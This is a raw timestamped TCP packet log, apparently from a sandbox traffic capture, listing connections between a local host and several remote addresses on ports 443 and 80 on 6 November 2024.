                                                                                                                                                                                                            Nov 6, 2024 06:29:50.009134054 CET44357757162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.009332895 CET57757443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.009342909 CET44357757162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.009615898 CET44357757162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.010020971 CET57757443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.010020971 CET57757443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.010032892 CET44357757162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.010072947 CET44357757162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.028424025 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.028487921 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.028590918 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.028599024 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.028666019 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.028697968 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.028769016 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.028775930 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.028913021 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.028976917 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.029031038 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.029058933 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.029088020 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.029128075 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.029154062 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.029161930 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.029448986 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.036109924 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.041063070 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.041135073 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.041372061 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.041493893 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.043327093 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.047338009 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.051207066 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.051207066 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.051208973 CET57754443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.051215887 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.051223993 CET44357754162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.051230907 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.051249027 CET57757443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.051250935 CET57755443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.084939003 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.085036993 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.085170984 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.085298061 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.097903013 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.097903013 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.097910881 CET57754443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.131198883 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.131275892 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.131288052 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.131320000 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.131349087 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.131459951 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.131557941 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.131575108 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.145811081 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.145951033 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.145987988 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146019936 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146049976 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146059036 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146089077 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146119118 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146126032 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146153927 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146553040 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146610022 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146656036 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146662951 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.146728992 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.149831057 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.149877071 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.149909019 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.149936914 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.149970055 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.149971962 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.149986029 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.149995089 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.150257111 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.150429010 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.150491953 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.150588989 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.150595903 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.154541969 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.154690027 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.154696941 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.157449961 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.157494068 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.157526016 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.157553911 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.157582998 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.157586098 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.157596111 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.157612085 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.157702923 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.157708883 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.157948971 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.158072948 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.158077955 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.160799026 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.160895109 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.160923958 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.160959959 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.160988092 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.160990953 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.161001921 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.161026001 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.161088943 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.161402941 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.161493063 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.161520004 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.161547899 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.161556959 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.161741018 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.161814928 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.162386894 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.162467957 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.162472963 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.163819075 CET44357755162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.163898945 CET44357755162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.164187908 CET57755443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.165294886 CET57755443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.165297985 CET57770443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.165308952 CET44357755162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.165333986 CET44357770162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.165412903 CET57770443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.166392088 CET57770443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.166404009 CET44357770162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.166857004 CET8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.166999102 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.171669006 CET57771443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.171734095 CET44357771172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.171859980 CET57771443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.172116041 CET57771443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.172147036 CET44357771172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.176400900 CET57772443192.168.2.4157.240.0.6
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.176434040 CET44357772157.240.0.6192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.176614046 CET57772443192.168.2.4157.240.0.6
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.177918911 CET57772443192.168.2.4157.240.0.6
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.177932024 CET44357772157.240.0.6192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.201499939 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.216600895 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.262743950 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.262844086 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.262861013 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.262989998 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.262995005 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.263328075 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.263549089 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.263555050 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.263828039 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.263879061 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.264134884 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.266690969 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.266752958 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.266781092 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267033100 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267071962 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267098904 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267110109 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267142057 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267168999 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267175913 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267812967 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267848969 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267874956 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267879963 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267894030 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267908096 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267960072 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.267966032 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.268749952 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.268805981 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.268829107 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.268857002 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.268857002 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.268867016 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.268883944 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.269037962 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.269042969 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.269678116 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.269876957 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.269881964 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.274199963 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.274256945 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.274352074 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.274358988 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.274596930 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.274631023 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.274656057 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.274686098 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.274693012 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.274719000 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275129080 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275158882 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275187016 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275214911 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275226116 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275254011 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275881052 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275909901 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275942087 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275969982 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275970936 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.275979996 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.276000023 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.276108027 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.276736021 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.276791096 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.276818037 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.276895046 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.276907921 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.276912928 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.276946068 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.277560949 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.277616024 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.277646065 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.277664900 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.277672052 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278023005 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278028965 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278170109 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278202057 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278218985 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278227091 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278270006 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278686047 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278729916 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278748035 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278772116 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278789043 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278795958 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.278820992 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.279746056 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.279771090 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.279798031 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.279798031 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.279808998 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.279895067 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.280168056 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.280221939 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.280250072 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.280275106 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.280282021 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.280306101 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.310079098 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.325274944 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.325280905 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.362021923 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.362422943 CET57764443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.362438917 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.363323927 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.363607883 CET57764443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.363876104 CET57764443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.363935947 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.364029884 CET57764443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.379878998 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.379951000 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.380017996 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.380064964 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.380136013 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.380178928 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.381000042 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.381053925 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384099960 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384145975 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384175062 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384193897 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384205103 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384238005 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384238958 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384249926 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384296894 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384304047 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384396076 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384437084 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384440899 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384448051 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384480000 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.384954929 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.385020018 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.385081053 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.385123968 CET57758443192.168.2.4162.159.140.34
